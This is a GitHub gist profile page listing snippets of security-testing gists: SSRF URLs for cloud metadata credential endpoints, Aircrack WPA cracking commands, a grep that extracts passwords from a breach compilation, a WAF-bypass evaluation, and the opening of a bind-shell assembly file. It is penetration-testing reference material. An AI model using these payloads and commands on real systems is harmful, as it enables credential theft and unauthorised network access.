Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

240 followers · 2.3k following
View GitHub Profile
@duraki
duraki / cloud_metadata.txt
Created January 7, 2020 22:09 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@duraki
duraki / sqlmap-tamper-scripts-evaluation.md
Created July 4, 2019 12:59 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@duraki
duraki / Aircrack Commands
Created March 22, 2019 10:24 — forked from victorreyesh/Aircrack Commands
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s
sudo airport en1 sniff [CHANNEL]
@duraki
duraki / gist:cff95010c15a0ebcded372179b7b0f42
Created January 17, 2019 11:40 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@duraki
duraki / web-servers.md
Created February 5, 2018 17:46 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@duraki
duraki / breach_compilation_passlist-extraction.txt
Last active May 7, 2022 12:49
1.4 billion password breach compilation wordlist
# => create a wordlist from original 41G stash via:
$ grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
# => compressed with:
$ 7z a breachcompilation.txt.7z breachcompilation.txt
# => size (rel):
## 4.1G compressed
## 9.0G uncompressed
@duraki
duraki / shell_bind_tcp.asm
Created December 9, 2017 18:54 — forked from geyslan/shell_bind_tcp.asm
Shell Bind TCP in Assembly (Linux/x86)
; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
global _start
section .text
_start:
; syscalls (/usr/include/asm/unistd_32.h)
; socketcall numbers (/usr/include/linux/net.h)